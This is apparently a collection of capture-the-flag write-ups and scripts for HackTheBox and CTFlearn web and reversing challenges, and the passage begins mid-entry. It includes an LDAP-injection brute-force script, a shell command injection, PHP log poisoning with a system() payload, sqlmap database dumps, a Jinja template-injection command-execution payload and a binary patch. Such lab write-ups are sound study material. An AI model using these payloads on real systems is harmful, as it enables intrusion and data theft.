get the flag through `brute force`. To do this, write a `Python script`.\n\n```python\nimport requests\nimport string\n\nURL = \"~\"\n\nasciiLower = list(string.ascii_lowercase)\n\nasciiUppercase = list(string.ascii_uppercase)\n\npasswordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + [\"_\", \"}\"]\n\npayload = \"HTB{\"\npassword = \"\"\n\nwhile True:\n for ch in passwordList:\n password = payload + ch + \"*)(&\"\n\n data = {\"username\": \"Reese\", \"password\": password}\n re = requests.post(URL, data=data)\n\n if \"success\" in re.text:\n payload += ch\n print(payload)\n\n```\nThe flag is like this 👌👉 `HTB{d1rectory_******_**_****}`" }, { "alpha_fraction": 0.5675675868988037, "alphanum_fraction": 0.5855855941772461, "avg_line_length": 25.428571701049805, "blob_id": "8d0419000ec204c710ee508221855690fcb9ac0a", "content_id": "d1a3cbe3c1ebf79ff82c98d503d6fd08ed6c4d70", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "permissive", "max_line_length": 60, "num_lines": 21, "path": "/HackTheBox/challenges/web/Emdee-five-for-life/script.py", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "import requests\nimport hashlib\nimport sys\nimport re\n\n\ndef main(url):\n request = requests.session()\n body = request.get(url).text\n text = re.search(\"<h3 align='center'>+.*?</h3>\",body)\n text = re.search(\">+.*?<\",text[0])\n hash = hashlib.md5(text[0][1:-1].encode()).hexdigest()\n response = request.post(url = url, data = {\"hash\":hash})\n flag = re.search(\"HTB{+.*?}\",response.text)[0]\n print(flag)\n\nif __name__==\"__main__\":\n if len(sys.argv) > 1:\n main(sys.argv[1])\n else:\n print(\"Please enter the challenge URL\")\n" }, { "alpha_fraction": 0.7071129679679871, "alphanum_fraction": 0.7196652889251709, "avg_line_length": 24.210525512695312, "blob_id": "c513396621e1432ea62ad750c4136ae1f678e86b", "content_id": "1c68be12ba30b2b84d962cbfec1a40d8668264e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 478, "license_type": "permissive", "max_line_length": 85, "num_lines": 19, "path": "/CTFlearn/web/Calculat3-M3/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Calculat3 M3\n\nA simple command injection challenge will be demonstrated in this walkthrough\n\nHere is the challenge page we got after visiting the given link.\n\nI provided random input in this calculator and intercepted the request with BurpSuite\n\nI got one parameter `expression` taking the values \n```\nexpression: 8 5 * 6 6 \n```\n`;ls` was used to try to inject commands\n\nAfter forwarding the request above, it has finally been flagged\n\n```\nctf{*****_***_***_***_*********}\n```" }, { "alpha_fraction": 0.6219751238822937, "alphanum_fraction": 0.6507521271705627, "avg_line_length": 22.507692337036133, "blob_id": "9e27f105a82918a7491225c6fbf4981eb58099ae", "content_id": "4309f8a14b8d1b8c89b4f74e88f86c6fe98ec722", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1531, "license_type": "permissive", "max_line_length": 129, "num_lines": 65, "path": "/HackTheBox/challenges/web/Emdee-five-for-life/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Emdee five for life writeup\n<b>Starting point</b>\n\nour only task is to submit the string after converting it to md5 hash \n\nbut when i tried to submit i got this\n> Yup Too slow\n\nWe'll automate this by writing a Python script\n\n# page source\n```html\n<html>\n<head>\n<title>emdee five for life</title>\n</head>\n<body style=\"background-color:powderblue;\">\n<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>B6KsLl2q3nMwLszk3DVJ</h3><center><form action=\"\" method=\"post\">\n<input type=\"text\" name=\"hash\" placeholder=\"MD5\" align='center'></input>\n</br>\n<input type=\"submit\" value=\"Submit\"></input>\n</form></center>\n</body>\n</html>\n```\n\n# Building the script\nSo with my crappy skills of regex let’s start building the logic\n\n`><h3 align='center'>sR1LvFdED1Toos1uBn6k</h3>`\n\nThis was achieved by using this\n\n`center'>+.*?</h3>`\n\n# script\n```python\nimport requests\nimport hashlib\nimport sys\nimport re\n\n\ndef main(url):\n request = requests.session()\n body = request.get(url).text\n text = re.search(\"<h3 align='center'>+.*?</h3>\",body)\n text = re.search(\">+.*?<\",text[0])\n hash = hashlib.md5(text[0][1:-1].encode()).hexdigest()\n response = request.post(url = url, data = {\"hash\":hash})\n flag = re.search(\"HTB{+.*?}\",response.text)[0]\n print(flag)\n\nif __name__==\"__main__\":\n if len(sys.argv) > 1:\n main(sys.argv[1])\n else:\n print(\"Please enter the challenge URL\")\n\n```\n# Getting the flag\n```\nD:\\hackthebox\\web>python script.py http://46.101.20.243:30585/\nHTB{*-*-*-*-*-*-*-*-*-*}\n```\n\n" }, { "alpha_fraction": 0.5957854390144348, "alphanum_fraction": 0.5996168851852417, "avg_line_length": 20.75, "blob_id": "c5c658b4daf8bcdb244555b0cef6ee8f349966d4", "content_id": "680ae06c477fa8f0e383cd58cd63b0163bb20f17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 522, "license_type": "permissive", "max_line_length": 85, "num_lines": 24, "path": "/HackTheBox/challenges/web/Phonebook/script.py", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nURL = \"~\"\n\nasciiLower = list(string.ascii_lowercase)\n\nasciiUppercase = list(string.ascii_uppercase)\n\npasswordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + [\"_\", \"}\"]\n\npayload = \"HTB{\"\npassword = \"\"\n\nwhile True:\n for ch in passwordList:\n password = payload + ch + \"*)(&\"\n\n data = {\"username\": \"Reese\", \"password\": password}\n re = requests.post(URL, data=data)\n\n if \"success\" in re.text:\n payload += ch\n print(payload)\n" }, { "alpha_fraction": 0.6932599544525146, "alphanum_fraction": 0.7214580178260803, "avg_line_length": 24.98214340209961, "blob_id": "f80fdbeba50d8eb1683800a9c753f2497ffed6a8", "content_id": "860c233b87656d1514e33ccb9c51a6d0a21f7676", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1454, "license_type": "permissive", "max_line_length": 209, "num_lines": 56, "path": "/HackTheBox/challenges/web/Toxic/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Toxic\nThe following is a quick writeup for the Toxic challenge.\n\nBy inspecting the challenge's files, specifically index.php and PageModel.php, we see that our phpsessid cookie is deserialised, and the file to display on the screen is retrieved from the deserialised object.\n\nThe cookie is converted to ascii and the object is produced\n```\necho 'Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9' | base64 -d\nO:9:\"PageModel\":1:{s:4:\"file\";s:15:\"/www/index.html\";}\n```\nWhile we are able to read and modify files from the server, we cannot access the flag file since we don't know its name. Therefore, we poison the server logs.\n\n```\necho 'O:9:\"PageModel\":1:{s:4:\"file\";s:25:\"/var/log/nginx/access.log\";}' | base64\nTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNz\nLmxvZyI7fQo=\n```\nThis new cookie will be sent to the server, and the log file can be read.\n```\nGET / HTTP/1.1\nHost: 127.0.0.1:1234\nUser-Agent: <?php system('ls /');?>\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\n```\nWe send this request to poison the nginx log, and when we display the log file again, we see a directory listing.\n```\ndev\nentrypoint.sh\netc\nflag_SDCCSD\nhome\nlib\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n```\nThe cookie reads the flag file, we send it to the server, The flag is ours.\n```\necho 'O:9:\"PageModel\":1:{s:4:\"file\";s:11:\"/flag_SDCCSD\";}' | base64\n\nTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfU0RDQ1NEIjt9\n```" }, { "alpha_fraction": 0.5945355296134949, "alphanum_fraction": 0.6065573692321777, "avg_line_length": 31.714284896850586, "blob_id": "dc2f07d96219cc1c4506043ae801fd548d0f7834", "content_id": "916e81998fb43d8c6a7bfff5cd17f091da258f51", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 929, "license_type": "permissive", "max_line_length": 167, "num_lines": 28, "path": "/CTFlearn/web/Inj3ction-Time/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Inj3ction Time \nFrom the description you’ll notice that there’s SQLi and you’ll use UNION query, the injection here is UNION based. Nice !\n\nYou’ll find that there’s input field ID and you should enter numbers and then you’ll see information about the users, if you try to insert words you won’t get anything\n\n> You can use sqlmap\n\nWe must first extract the names of the existing databases :\n```\npython sqlmap.py -u https://web.ctflearn.com/web8/?id= -p id --dbs\n\navailable databases [2]:\n[*] information_schema\n[*] webeight\n```\nThe next step is to extract the `webeight` database information\n```\npython sqlmap.py -u https://web.ctflearn.com/web8/?id= -p id -D webeight --dump\n\nDatabase: webeight\nTable: w0w_y0u_f0und_m3\n[1 entry]\n+---------------------------------+\n| f0und_m3 |\n+---------------------------------+\n| abctf{*-*-*-*-*-*-*-*-*-*-*-*-} |\n+---------------------------------+\n```" }, { "alpha_fraction": 0.4330598711967468, "alphanum_fraction": 0.5795950293540955, "avg_line_length": 49.25877380371094, "blob_id": "531e3eaf36e254c7f808b904802e41ab412be534", "content_id": "14b686d3d03c60630fe560a1cfe1241a1fabf3da", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11822, "license_type": "permissive", "max_line_length": 260, "num_lines": 228, "path": "/HackTheBox/challenges/reversing/Impossible-Password/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Impossible Password\n\nOnce extracted, we have the `impossible_password.bin` file. Let's see what type it is.\n```\nfile impossible_password.bin\nimpossible_password.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ba116ba1912a8c3779ddeb579404e2fdf34b1568, stripped\n```\n\nIt’s an `ELF 64-bit LSB` executable.\n\nStrings inside the `.data` section\n```\nrabin2 -z impossible_password.bin\n[Strings]\nnth paddr vaddr len size section type string\n―――――――――――――――――――――――――――――――――――――――――――――――――――――――\n0 0x00000a70 0x00400a70 14 15 .rodata ascii SuperSeKretKey\n1 0x00000a82 0x00400a82 4 5 .rodata ascii %20s\n2 0x00000a87 0x00400a87 5 6 .rodata ascii [%s]\\n\n```\n\n`SuperSeKretKey` appears to be interesting\n\n# Execution\n```\nchmod +x impossible_password.bin\n./impossible_password.bin\n* SuperSeKretKey\n[SuperSeKretKey]\n** WhatShouldIWrite?\n```\n\nBy executing this program, a star `(*)` is displayed. I want to write `SuperSeKretKey` because the string displayed in the `.data` section informs us that the string (`%s`) is manipulated. Indeed, when I put SuperSeKretKey, this text is surrounded with `[]`.\n\nAfter this, two stars `(**)` are displayed. I’ve tried to write many things (as WhatShouldIWrite?), but the program always terminates\n\nIt looks like the program is waiting for a specific string, but I don’t know what it is.\n\n# Reverse engineering\n<i>Let's use Radare2</i>\n\nPerform analysis :\n```\nradare2 impossible_password.bin\n[0x004006a0]> aaaa\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[x] Finding function preludes\n[x] Enable constraint types analysis for variables\n```\nChange memory address to main function :\n```\n[0x004006a0]> s main\n[0x0040085d]>\n```\nThe focus is now at the `main()` address: `0x0040085d`.\n\n# Disassemble\n\nWith the `pdf` command, disassemble the `main()` code \n\n> pdf => `print disassemble function`\n\n```\n[0x0040085d]> pdf\n ; DATA XREF from entry0 @ 0x4006bd\n┌ 283: int main (int argc, char **argv);\n│ ; var int64_t var_50h @ rbp-0x50\n│ ; var int64_t var_44h @ rbp-0x44\n│ ; var int64_t var_40h @ rbp-0x40\n│ ; var int64_t var_3fh @ rbp-0x3f\n│ ; var int64_t var_3eh @ rbp-0x3e\n│ ; var int64_t var_3dh @ rbp-0x3d\n│ ; var int64_t var_3ch @ rbp-0x3c\n│ ; var int64_t var_3bh @ rbp-0x3b\n│ ; var int64_t var_3ah @ rbp-0x3a\n│ ; var int64_t var_39h @ rbp-0x39\n│ ; var int64_t var_38h @ rbp-0x38\n│ ; var int64_t var_37h @ rbp-0x37\n│ ; var int64_t var_36h @ rbp-0x36\n│ ; var int64_t var_35h @ rbp-0x35\n│ ; var int64_t var_34h @ rbp-0x34\n│ ; var int64_t var_33h @ rbp-0x33\n│ ; var int64_t var_32h @ rbp-0x32\n│ ; var int64_t var_31h @ rbp-0x31\n│ ; var int64_t var_30h @ rbp-0x30\n│ ; var int64_t var_2fh @ rbp-0x2f\n│ ; var int64_t var_2eh @ rbp-0x2e\n│ ; var int64_t var_2dh @ rbp-0x2d\n│ ; var int64_t var_20h @ rbp-0x20\n│ ; var int64_t var_ch @ rbp-0xc\n│ ; var int64_t var_8h @ rbp-0x8\n│ ; arg int argc @ rdi\n│ ; arg char **argv @ rsi\n│ 0x0040085d 55 push rbp\n│ 0x0040085e 4889e5 mov rbp, rsp\n│ 0x00400861 4883ec50 sub rsp, 0x50\n│ 0x00400865 897dbc mov dword [var_44h], edi ; argc\n│ 0x00400868 488975b0 mov qword [var_50h], rsi ; argv\n│ 0x0040086c 48c745f8700a. mov qword [var_8h], str.SuperSeKretKey ; 0x400a70 ; \"SuperSeKretKey\"\n│ 0x00400874 c645c041 mov byte [var_40h], 0x41 ; 'A' ; 65\n│ 0x00400878 c645c15d mov byte [var_3fh], 0x5d ; ']' ; 93\n│ 0x0040087c c645c24b mov byte [var_3eh], 0x4b ; 'K' ; 75\n│ 0x00400880 c645c372 mov byte [var_3dh], 0x72 ; 'r' ; 114\n│ 0x00400884 c645c43d mov byte [var_3ch], 0x3d ; '=' ; 61\n│ 0x00400888 c645c539 mov byte [var_3bh], 0x39 ; '9' ; 57\n│ 0x0040088c c645c66b mov byte [var_3ah], 0x6b ; 'k' ; 107\n│ 0x00400890 c645c730 mov byte [var_39h], 0x30 ; '0' ; 48\n│ 0x00400894 c645c83d mov byte [var_38h], 0x3d ; '=' ; 61\n│ 0x00400898 c645c930 mov byte [var_37h], 0x30 ; '0' ; 48\n│ 0x0040089c c645ca6f mov byte [var_36h], 0x6f ; 'o' ; 111\n│ 0x004008a0 c645cb30 mov byte [var_35h], 0x30 ; '0' ; 48\n│ 0x004008a4 c645cc3b mov byte [var_34h], 0x3b ; ';' ; 59\n│ 0x004008a8 c645cd6b mov byte [var_33h], 0x6b ; 'k' ; 107\n│ 0x004008ac c645ce31 mov byte [var_32h], 0x31 ; '1' ; 49\n│ 0x004008b0 c645cf3f mov byte [var_31h], 0x3f ; '?' ; 63\n│ 0x004008b4 c645d06b mov byte [var_30h], 0x6b ; 'k' ; 107\n│ 0x004008b8 c645d138 mov byte [var_2fh], 0x38 ; '8' ; 56\n│ 0x004008bc c645d231 mov byte [var_2eh], 0x31 ; '1' ; 49\n│ 0x004008c0 c645d374 mov byte [var_2dh], 0x74 ; 't' ; 116\n│ 0x004008c4 bf7f0a4000 mov edi, 0x400a7f ; const char *format\n│ 0x004008c9 b800000000 mov eax, 0\n│ 0x004008ce e82dfdffff call sym.imp.printf ; int printf(const char *format)\n│ 0x004008d3 488d45e0 lea rax, [var_20h]\n│ 0x004008d7 4889c6 mov rsi, rax\n│ 0x004008da bf820a4000 mov edi, str.20s ; 0x400a82 ; \"%20s\" ; const char *format\n│ 0x004008df b800000000 mov eax, 0\n│ 0x004008e4 e887fdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n│ 0x004008e9 488d45e0 lea rax, [var_20h]\n│ 0x004008ed 4889c6 mov rsi, rax\n│ 0x004008f0 bf870a4000 mov edi, str.s ; 0x400a87 ; \"[%s]\\n\" ; const char *format\n│ 0x004008f5 b800000000 mov eax, 0\n│ 0x004008fa e801fdffff call sym.imp.printf ; int printf(const char *format)\n│ 0x004008ff 488b55f8 mov rdx, qword [var_8h]\n│ 0x00400903 488d45e0 lea rax, [var_20h]\n│ 0x00400907 4889d6 mov rsi, rdx ; const char *s2\n│ 0x0040090a 4889c7 mov rdi, rax ; const char *s1\n│ 0x0040090d e81efdffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n│ 0x00400912 8945f4 mov dword [var_ch], eax\n│ 0x00400915 837df400 cmp dword [var_ch], 0\n│ ┌─< 0x00400919 740a je 0x400925\n│ │ 0x0040091b bf01000000 mov edi, 1 ; int status\n│ │ 0x00400920 e85bfdffff call sym.imp.exit ; void exit(int status)\n│ │ ; CODE XREF from main @ 0x400919\n│ └─> 0x00400925 bf8d0a4000 mov edi, 0x400a8d ; const char *format\n│ 0x0040092a b800000000 mov eax, 0\n│ 0x0040092f e8ccfcffff call sym.imp.printf ; int printf(const char *format)\n│ 0x00400934 488d45e0 lea rax, [var_20h]\n│ 0x00400938 4889c6 mov rsi, rax\n│ 0x0040093b bf820a4000 mov edi, str.20s ; 0x400a82 ; \"%20s\" ; const char *format\n│ 0x00400940 b800000000 mov eax, 0\n│ 0x00400945 e826fdffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n│ 0x0040094a bf14000000 mov edi, 0x14 ; 20 ; size_t arg1\n│ 0x0040094f e839feffff call fcn.0040078d\n│ 0x00400954 4889c2 mov rdx, rax\n│ 0x00400957 488d45e0 lea rax, [var_20h]\n│ 0x0040095b 4889d6 mov rsi, rdx ; const char *s2\n│ 0x0040095e 4889c7 mov rdi, rax ; const char *s1\n│ 0x00400961 e8cafcffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n│ 0x00400966 85c0 test eax, eax\n│ ┌─< 0x00400968 750c jne 0x400976\n│ │ 0x0040096a 488d45c0 lea rax, [var_40h]\n│ │ 0x0040096e 4889c7 mov rdi, rax ; int64_t arg1\n│ │ 0x00400971 e802000000 call fcn.00400978\n│ │ ; CODE XREF from main @ 0x400968\n│ └─> 0x00400976 c9 leave\n└ 0x00400977 c3 ret\n```\n\nFrom `0x0040086c` to `0x00400920` memory addresses, some manipulations are carried out on strings and to be honest, I didn’t try to understand because something popped into my head.\n\nAt `0x00400961` memory address, the binary safe string comparison strcmp is performed between `*s1` and `*`s2`.\n\nLet’s talk about the `0x00400968` memory address.\n\nRegister `eax` will contain the return code from `strcmp`, after the call. The test `eax`, `eax` is the same as `and` `eax`, `eax` (bitwise and) except that it doesn’t store the result in `eax`. So `eax` isn’t affected by the test, but the `zero-flag (ZF)` is.\n\nThe test `eax`, `eax` is necessary to make the jne work in the first place. Also, jne is the same as `jnz`, just as `je` is the same as `jz`. Both act based on the `ZF` value.\n\nThe `jne` branch will be taken if `ZF=0` and therefore whenever `strcmp` returns a non-zero value (strings not equal). Conversely if `eax` contains zero upon return from `strcmp`, the jump via `jne` will not happen.\n\nIf you have understood everything correctly, `strcmp` compares the strings and sets `eax` to zero if the strings are `equal`. If they are not, the `jne` instruction takes us to the memory address `0x00400976` which is the program’s exit (leave).\n\n# Reopen in read-write\n```\n[0x0040085d]> oo+\n```\nChange memory address focus\n\nWe want to edit the `jne` section, so let’s jump into this memory address.\n```\nChange memory address focus\nWe want to edit the jne section, so let’s jump into this memory address.\n```\nASM instruction modification\n\nThe easy way to bypass this `jne` is to write `NOP` (`No OPeration`) instruction.\n```\n[0x00400968]> wx 9090\n[0x00400968]> wa nop\nWritten 1 byte(s) (nop) = wx 90\n```\nWe can see our new instruction by disassembling a new time (the disassemble has been truncated).\n```\n[0x00400968]> pdf\n0x00400961 e8cafcffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n0x00400966 85c0 test eax, eax\n0x00400968 90 nop\n```\nThat’s all with `radare2`, we can leave.\n```\n[0x00400968]> q\n```\nExecution\n```\n./impossible_password.bin\n* SuperSeKretKey\n[SuperSeKretKey]\n** plop\nHTB{+*+*+*+*+*+*+*+*+*+*+*+*}\n```\nAffected by: [Adrien](https://illuad.fr/2020/07/16/writeup-htb-reversing-impossible-password.html)" }, { "alpha_fraction": 0.6403820514678955, "alphanum_fraction": 0.6479342579841614, "avg_line_length": 35.314517974853516, "blob_id": "75ce70bfecf398d5fc0dcc6f0c4fae89c59a687f", "content_id": "49e79c1788ec9f98cf3b999a606ae85527eec874", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4502, "license_type": "permissive", "max_line_length": 259, "num_lines": 124, "path": "/HackTheBox/challenges/web/baby-ninja-jinja/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# baby ninja jinja\n\nA form appears on the website. Since the entry did not appear to be vulnerable to SQL injection or any other attack.\n\nIf you see the source code `(crt + u)` of the page, such a thing is commented at the bottom of the page :\n```html\n</body>\n<!-- /debug -->\n</html>\n```\n\n> If we look at this path\n\n`/debug` :\n```python\nfrom flask import Flask, session, render_template, request, Response, render_template_string, g\nimport functools, sqlite3, os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.urandom(120)\n\nacc_tmpl = '''{% extends 'index.html' %}\n{% block content %}\n<h3>baby_ninja joined, total number of rebels: reb_num<br>\n{% endblock %}\n'''\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('/tmp/ninjas.db')\n db.isolation_level = None\n db.row_factory = sqlite3.Row\n db.text_factory = (lambda s: s.replace('{{', '').\n replace(\"'\", '&#x27;').\n replace('\"', '&quot;').\n replace('<', '&lt;').\n replace('>', '&gt;')\n )\n return db\n\ndef query_db(query, args=(), one=False):\n with app.app_context():\n cur = get_db().execute(query, args)\n rv = [dict((cur.description[idx][0], str(value)) \\\n for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n\[email protected]_first_request\ndef init_db():\n with app.open_resource('schema.sql', mode='r') as f:\n get_db().cursor().executescript(f.read())\n\[email protected]_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None: db.close()\n\ndef rite_of_passage(func):\n @functools.wraps(func)\n def born2pwn(*args, **kwargs):\n\n name = request.args.get('name', '')\n\n if name:\n query_db('INSERT INTO ninjas (name) VALUES (\"%s\")' % name)\n\n report = render_template_string(acc_tmpl.\n replace('baby_ninja', query_db('SELECT name FROM ninjas ORDER BY id DESC', one=True)['name']).\n replace('reb_num', query_db('SELECT COUNT(id) FROM ninjas', one=True).itervalues().next())\n )\n\n if session.get('leader'): \n return report\n\n return render_template('welcome.jinja2')\n return func(*args, **kwargs)\n return born2pwn\n\[email protected]('/')\n@rite_of_passage\ndef index():\n return render_template('index.html')\n\[email protected]('/debug')\ndef debug():\n return Response(open(__file__).read(), mimetype='text/plain')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)\n```\n\n# SSTI\n\nThis code shows that the name entry is inserted into a backend database and then extracted again from it to replace the substring `baby_ninja` in the `acc_tmpl` string, which is then passed to the `render_template_string` function.\n\nThe string acc_tmpl contains template blocks that are indicated by `{%\" and the trailing \"%}`. The challenge's name contains the word `Jinja`, which is a template language for Python.\n\nThe attack should consist of a `Server-Side Template Injection (SSTI)`. This is accomplished by inserting template blocks into our name parameter so that the template blocks are executed in the context of the backend server when rendering the template string.\n\n* SSTI attacks on Jinja & Python\n * [Jinja2 SSTI](https://hackmd.io/@Chivato/HyWsJ31dI#References)\n * [Jinja2 SSTI](https://realpython.com/primer-on-jinja-templating/)\n\nIt was built as follows\n```python\n{%+if+session.update({request.args.se:request.application.__globals__.__builtins__.__import__(request.args.os).popen(request.args.command).read()})+==+1+%}{%+endif+%}&se=asdf&os=os&command=ls\n```\nThe result of the above command cannot be displayed because it stores the result of the request in a cookie called a `session`\nWe must decode this cookie every time we send a request\n```bash\nflask-unsign --decode --cookie \"eyJhc2RmIjp7IiBiIjoiWVhCd0xuQjVDbVpzWVdkZlVEVTBaV1FLYzJOb1pXMWhMbk54YkFwemRHRjBhV01LZEdWdGNHeGhkR1Z6Q2c9PSJ9fQ.YRQfrQ.HxMrG2AVH-UYqJ2LUUCVt8lEvDw\"\n\n{'asdf': b'app.py\\nflag_P54ed\\nschema.sql\\nstatic\\ntemplates\\n'}\n```\nAs you can see above, the name of the flag is clear so the next request is as follows:\n```python\n{%+if+session.update({request.args.se:request.application.__globals__.__builtins__.__import__(request.args.os).popen(request.args.command).read()})+==+1+%}{%+endif+%}&se=asdf&os=os&command=cat flag_P54ed\n```\nIf we decode the session cookie twice, the flag is visible\n```\nflask-unsign --decode --cookie [COOKIE]\n{'asdf': b'HTB{b4by_ninj4s_****_***_******_**_******}\\n'}\n```" } ]
14
ethanjpark/enigma_python
https://github.com/ethanjpark/enigma_python
a8541d021cf38cb350d830e7780caa51cf49ffd4
54f156301f251fe04e6b45618c85b9f8f3158b4e
631407b595b8bd50dbaf4faa48d9513183073bf3
refs/heads/master
2020-08-26T20:47:02.448478
2019-10-28T17:16:35
2019-10-28T17:16:35
217,143,814
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.650191068649292, "alphanum_fraction": 0.6766917109489441, "avg_line_length": 30.44961166381836, "blob_id": "33cdb6fe15f790d8b40bed0906bffeda6aea7b44", "content_id": "7cec5474195337cabeec8bde78d47fb8c2d38faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8113, "license_type": "no_license", "max_line_length": 195, "num_lines": 258, "path": "/src/input.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "\"\"\"\nThe main enigma encryption process code.\n\nUser will input 3 rotors (I,II,III,IV,V), the reflector (A,B,C),\nring settings (3 numbers between 1~26), rotor start positions (3 letters), \nand plugboard configuration (29, 30, 31)\n\nOnce this is done, then user will type in message which will then be encrypted or\ndecrypted depending on which flag was raised initially.\n\nOr can use preset configuration (from key list #649), 29th, 30th, or 31st,\nby specifying either 29, 30, or 31 after the flag. User still needs to specify\nrotor starting positions.\n\"\"\"\n\nfrom rotors import *\nfrom plugboard import *\nimport sys\nfrom enigma import enigma\n\n#holds the appropriate rotor dictionary (from rotors.py) and the notch locations\nleft_rotor = None\nleft_notch = None\nmid_rotor = None\nmid_notch = None\nright_rotor = None\nright_notch = None\n\nreflector = None #holds appropriate reflector dictionary (from rotors.py)\nplugboard = None #holds appropriate plugboard dictionary (from plugboard.py)\n\n#keeps track of rotor's current wiring state (which contact to which contact)\ncurr_left_rotor = {}\ncurr_mid_rotor = {}\ncurr_right_rotor = {}\n\n#reflector pin dict\nreflector_mapping = {}\n\n#starting pos\nright_starting_pos = None\nmid_starting_pos = None\nleft_starting_pos = None\n\n#alphabet-number matching\nalphabet_mapping = { 'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26 }\nalphabet = ['','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\nr_alphabet = ['','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A']\n\n#helper function for creating the wiring mapping dictionary\ndef create_curr_rotor_wiring_dict(rotor,ringstellung,starting_pos):\n\tglobal alphabet, alphabet_mapping\n\twiring_dict = {}\n\t#create mapping between contacts for each connection.\n\t#calculationg is based on the ringstellung and the rotor starting position\n\tif(ringstellung<1 or ringstellung>26):\n\t\tsys.exit(\"Invalid ringstellung, please select a number between 1 and 26\")\n\tif(not starting_pos.isalpha()):\n\t\tsys.exit(\"Invalid rotor starting position, please select an alphabetic character\")\n\tfor i in range(1,27):\n\t\tcontact_out = alphabet_mapping[rotor[alphabet[i]]]\n\t\tcontact_in = i\n\t\t#apply ringstellung offset\n\t\tcontact_in += ringstellung-1\n\t\tcontact_out += ringstellung-1\n\t\t#keep contacts in range 1-26\n\t\tif(contact_in > 26):\n\t\t\tcontact_in -= 26\n\t\tif(contact_out > 26):\n\t\t\tcontact_out -= 26\n\t\t#apply rotor starting position offset\n\t\tcontact_in -= alphabet_mapping[starting_pos]-1\n\t\tcontact_out -= alphabet_mapping[starting_pos]-1\n\t\t#keep contacts in range 1-26\n\t\tif(contact_in < 1):\n\t\t\tcontact_in += 26\n\t\tif(contact_out < 1):\n\t\t\tcontact_out += 26\n\t\twiring_dict[contact_in] = contact_out\n\treturn wiring_dict\n\n#check for correct # of args depending on custom config (9) or preset (2)\nif(len(sys.argv)!=12 and len(sys.argv)!=6):\n\n\tprint(\"Incorrect usage. Please see below for examples.\\n\")\n\tprint(\"Custom configuration: python input.py I II III A 1 2 3 A B C 29\\n\")\n\tprint(\"Preset: python input.py 29 A A B C\")\n\tsys.exit()\n\nelse:\n\t#assign correct dictionaries and values to the global variables based on inputs\n\tif(len(sys.argv)==12): #custom configuration\n\t\t#left rotor\n\t\tif(sys.argv[1]=='I'):\n\t\t\tleft_rotor = 